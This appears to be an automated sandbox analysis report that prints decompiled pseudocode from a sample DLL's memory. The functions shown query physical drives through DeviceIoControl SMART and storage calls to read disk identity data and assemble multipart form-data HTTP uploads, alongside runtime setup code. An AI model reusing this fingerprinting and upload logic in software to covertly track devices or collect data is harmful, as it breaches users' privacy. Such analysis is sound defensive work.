				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF80(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF80(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF80( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CDD0( &_v1596);
					_t94 = E1001D000(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}

0x1001d840
0x1001d84c
0x1001d853
0x1001dac4
0x00000000
0x1001dac4
0x1001d859
0x1001d863
0x1001d86d
0x1001d87a
0x1001d891
0x1001d8ac
0x1001d8b2
0x1001d8d1
0x1001d8d8
0x1001da9d
0x1001daac
0x1001dab5
0x00000000
0x1001dabf
0x00000000
0x1001dab7
0x1001d8de
0x1001d8e8
0x1001d8f2
0x1001d8fc
0x1001d906
0x1001d910
0x1001d91a
0x1001d94b
0x1001da97
0x00000000
0x1001da97
0x1001d95a
0x1001da76
0x1001da7a
0x1001da87
0x00000000
0x1001da91
0x00000000
0x1001da89
0x1001d974
0x1001d97f
0x1001d985
0x1001d98c
0x1001d993
0x1001d99a
0x1001d9a1
0x1001d9a8
0x1001d9af
0x1001d9b6
0x1001d9bd
0x1001d9cf
0x1001d9fb
0x1001da00
0x1001da05
0x00000000
0x00000000
0x1001da0d
0x1001da16
0x1001da19
0x1001da22
0x1001da2a
0x1001da33
0x1001da3c
0x1001da50
0x1001da60
0x1001da65
0x1001da6a
0x1001da6c
0x1001da6c
0x00000000
0x1001da6a
0x00000000

APIs

_memset.LIBCMT ref: 1001D891
wsprintfW.USER32 ref: 1001D8AC
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D8CB
DeviceIoControl.KERNEL32 ref: 1001D943
_memset.LIBCMT ref: 1001D9CF
CloseHandle.KERNEL32(000000FF), ref: 1001DA7A
CloseHandle.KERNEL32(000000FF), ref: 1001DA97

Strings

\\.\PhysicalDrive%d, xrefs: 1001D8A0

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 381188756-2935326385
Opcode ID: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
Instruction ID: 9769834fe5c7fcaed127812980974d4bd2fdd9b920265f280a0c2248b2b16186
Opcode Fuzzy Hash: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
Instruction Fuzzy Hash: EA615EB0D042189BEB20DF94CC95BDDB7B6EF84314F148199E5097B280DB76AAD8CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001DAD0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001DAD0(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018B00(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF80(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
						E1000CF80(_t70,  &_v11556, 0, 0x3e8);
						E1001D0A0(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001D000( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					CloseHandle(_v16);
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}

0x1001dad0
0x1001dad8
0x1001dae1
0x1001dc50
0x00000000
0x1001dc50
0x1001dae7
0x1001daee
0x1001daf5
0x1001daff
0x1001db1c
0x1001db22
0x1001db3e
0x1001db45
0x1001dc2e
0x1001dc34
0x1001dc3a
0x1001dc44
0x00000000
0x1001dc4b
0x00000000
0x1001dc46
0x1001db4b
0x1001db55
0x1001db5f
0x1001db69
0x1001db81
0x1001db86
0x1001dbb8
0x1001dbc8
0x1001dbe5
0x1001dbfd
0x1001dc02
0x1001dc07
0x1001dc09
0x1001dc09
0x1001dc07
0x1001dc14
0x1001dc1e
0x1001dc2b
0x00000000
0x1001dc20
0x00000000
0x1001dc20
0x1001dc1e
0x00000000

APIs

wsprintfW.USER32 ref: 1001DB1C
CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
_memset.LIBCMT ref: 1001DB81
DeviceIoControl.KERNEL32 ref: 1001DBB0
_memset.LIBCMT ref: 1001DBC8
CloseHandle.KERNEL32(000000FF), ref: 1001DC14

Strings

\\.\PhysicalDrive%d, xrefs: 1001DB10

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 1858725146-2935326385
Opcode ID: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
Instruction ID: 915ac6fd4bdffd3e24e0157f7485166cbeb8f51988887240e801f9576dbfd67f
Opcode Fuzzy Hash: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
Instruction Fuzzy Hash: B3413F75E40218EBEB10EB90DC89FDDB7B8EB14704F104599E509AA2C1D7B4ABC8CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1001D3D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CEAF(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA40(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CDD0( &_v1564);
							_t76 = E1001D000(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}

APIs

wsprintfW.USER32 ref: 1001D40A
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D429
DeviceIoControl.KERNEL32 ref: 1001D4A2

Strings

\\.\PhysicalDrive%d, xrefs: 1001D3FE

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ControlCreateDeviceFilewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 3081802084-2935326385
Opcode ID: 785b4095dcf1ad38b12bd82e7762c96a16d820994563cc4dfa42c82c3201bccd
Instruction ID: f26b544c4fccea81e18431b955f202ed2237751288ed87d0487abbb64b72177a
Opcode Fuzzy Hash: 785b4095dcf1ad38b12bd82e7762c96a16d820994563cc4dfa42c82c3201bccd
Instruction Fuzzy Hash: 38512EB4D00218EFEB10DF94CC85BDEB7B5EB84704F104599E509AB280D7B6AB94CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000F05C, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000F05C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103342d8; // 0xf588771a
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10335a58 = _t6;
				 *0x10335a54 = _t22;
				 *0x10335a50 = _t25;
				 *0x10335a4c = _t21;
				 *0x10335a48 = _t27;
				 *0x10335a44 = _t26;
				 *0x10335a70 = ss;
				 *0x10335a64 = cs;
				 *0x10335a40 = ds;
				 *0x10335a3c = es;
				 *0x10335a38 = fs;
				 *0x10335a34 = gs;
				asm("pushfd");
				_pop( *0x10335a68);
				 *0x10335a5c =  *_t31;
				 *0x10335a60 = _v0;
				 *0x10335a6c =  &_a4;
				 *0x103359a8 = 0x10001;
				_t11 =  *0x10335a60; // 0x0
				 *0x1033595c = _t11;
				 *0x10335950 = 0xc0000409;
				 *0x10335954 = 1;
				_t12 =  *0x103342d8; // 0xf588771a
				_v812 = _t12;
				_t13 =  *0x103342dc; // 0xa7788e5
				_v808 = _t13;
				 *0x103359a0 = IsDebuggerPresent();
				_push(1);
				E10013ABF(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10024b30);
				if( *0x103359a0 == 0) {
					_push(1);
					E10013ABF(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 10016225
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001623A
UnhandledExceptionFilter.KERNEL32(10024B30), ref: 10016245
GetCurrentProcess.KERNEL32(C0000409), ref: 10016261
TerminateProcess.KERNEL32(00000000), ref: 10016268

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
Instruction ID: ee8eee148a0b36da5bac1509a6259723a028944e4d48fabcbe23e45d6083a592
Opcode Fuzzy Hash: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
Instruction Fuzzy Hash: 7B21D2B8802224DFD702DF65DCC46453BBCFB88315F915619E90D8EBA2EB709985EF05

Uniqueness

Uniqueness Score: -1.00%

Function 100215A0, Relevance: 48.4, APIs: 32, Instructions: 449
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100215A0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E100231DA);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018B00(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF80(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF80(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF80(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CCA3(_t353,  &_v808, _v812, _a16);
					E1000CCA3(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CCA3(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D1F0(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAD0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAD0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF80(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF80(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF80(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF80(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10003060( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A8B0(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E10002270( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF80(_t353,  &_v43912, 0, 0x3710);
								E1000CF80(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084));
								E1000D1F0(_t265, _t353, _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E100030B0( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)));
								E1000D903(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF80(_t353,  &_v58008, 0, 0x3710);
								E1000CF80(_t353,  &_v29808, 0, 0x3710);
								E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CCA3(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAD0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAD0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003090( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D1F0(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D903(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF80(_t353,  &_v58008, 0, 0x3710);
							E1000CF80(_t353,  &_v29808, 0, 0x3710);
							E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CCA3(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAD0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAD0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF80(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CCA3(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAD0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAD0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}

APIs

_memset.LIBCMT ref: 10021636
_memset.LIBCMT ref: 10021653
_memset.LIBCMT ref: 10021670
_sprintf.LIBCMT ref: 10021692
_strlen.LIBCMT ref: 100216EF
_strlen.LIBCMT ref: 10021717
_sprintf.LIBCMT ref: 100216D8

Part of subcall function 1000CCA3: __flsbuf.LIBCMT ref: 1000CD11

_sprintf.LIBCMT ref: 100216AC

Part of subcall function 1000CCA3: __output_l.LIBCMT ref: 1000CCF6

_memset.LIBCMT ref: 100217A5
_memset.LIBCMT ref: 100217C2
_memset.LIBCMT ref: 100217DF
_memset.LIBCMT ref: 100217FC
_strcpy_s.LIBCMT ref: 10021871
_memset.LIBCMT ref: 10021887
_memset.LIBCMT ref: 1002189D
_sprintf.LIBCMT ref: 100218BA
_sprintf.LIBCMT ref: 100218E6
_strlen.LIBCMT ref: 100218FD
_strlen.LIBCMT ref: 10021925
_memset.LIBCMT ref: 100219CE
_memset.LIBCMT ref: 100219E4
_strcpy_s.LIBCMT ref: 10021A91
_memset.LIBCMT ref: 10021AA7
_memset.LIBCMT ref: 10021ABD
_memset.LIBCMT ref: 10021BA4
_sprintf.LIBCMT ref: 10021BC3
_strlen.LIBCMT ref: 10021BDA
_strlen.LIBCMT ref: 10021C02

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
String ID:
API String ID: 854390245-0
Opcode ID: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
Instruction ID: cf3fdb6315e205635e4887c8713e315fd67cdd6efcc5cedbeed1e245040bfa00
Opcode Fuzzy Hash: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
Instruction Fuzzy Hash: F50292B6D00208ABDB10DB54DC82FDE777CEB58244F444598F509A7285EB75BB88CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 10011936, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10011936(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10335478 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033547c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10335480 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10335478;
					_t40 = TlsSetValue;
					 *0x10335484 = _t7;
					if( *0x10335478 == 0) {
						L6:
						 *0x1033547c = TlsGetValue;
						 *0x10335478 = E100115ED;
						 *0x10335480 = _t40;
						 *0x10335484 = TlsFree;
					} else {
						__eflags =  *0x1033547c;
						if( *0x1033547c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10335480;
							if( *0x10335480 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10334594 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033547c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10011D56();
							 *0x10335478 = E1001151E( *0x10335478);
							 *0x1033547c = E1001151E( *0x1033547c);
							 *0x10335480 = E1001151E( *0x10335480);
							 *0x10335484 = E1001151E( *0x10335484);
							_t18 = E1000F8ED();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10011620();
								goto L15;
							} else {
								_push(L100117AC);
								_t21 =  *((intOrPtr*)(E1001158A( *0x10335478)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10334590 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E10014911(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10334590);
										__eflags =  *((intOrPtr*)(E1001158A( *0x10335480)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001165D(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10011620();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000EA1D), ref: 1001193C
__mtterm.LIBCMT ref: 10011948

Part of subcall function 10011620: __decode_pointer.LIBCMT ref: 10011631
Part of subcall function 10011620: TlsFree.KERNEL32(0000001D,10011AB5), ref: 1001164B

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001195E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001196B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10011978
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10011985
TlsAlloc.KERNEL32 ref: 100119D5
TlsSetValue.KERNEL32(00000000), ref: 100119F0
__init_pointers.LIBCMT ref: 100119FA
__encode_pointer.LIBCMT ref: 10011A05
__encode_pointer.LIBCMT ref: 10011A15
__encode_pointer.LIBCMT ref: 10011A25
__encode_pointer.LIBCMT ref: 10011A35
__decode_pointer.LIBCMT ref: 10011A56
__calloc_crt.LIBCMT ref: 10011A6F
__decode_pointer.LIBCMT ref: 10011A89
__initptd.LIBCMT ref: 10011A98
GetCurrentThreadId.KERNEL32 ref: 10011A9F

Strings

KERNEL32.DLL, xrefs: 10011937
FlsSetValue, xrefs: 1001196D
FlsGetValue, xrefs: 10011960
FlsAlloc, xrefs: 10011958
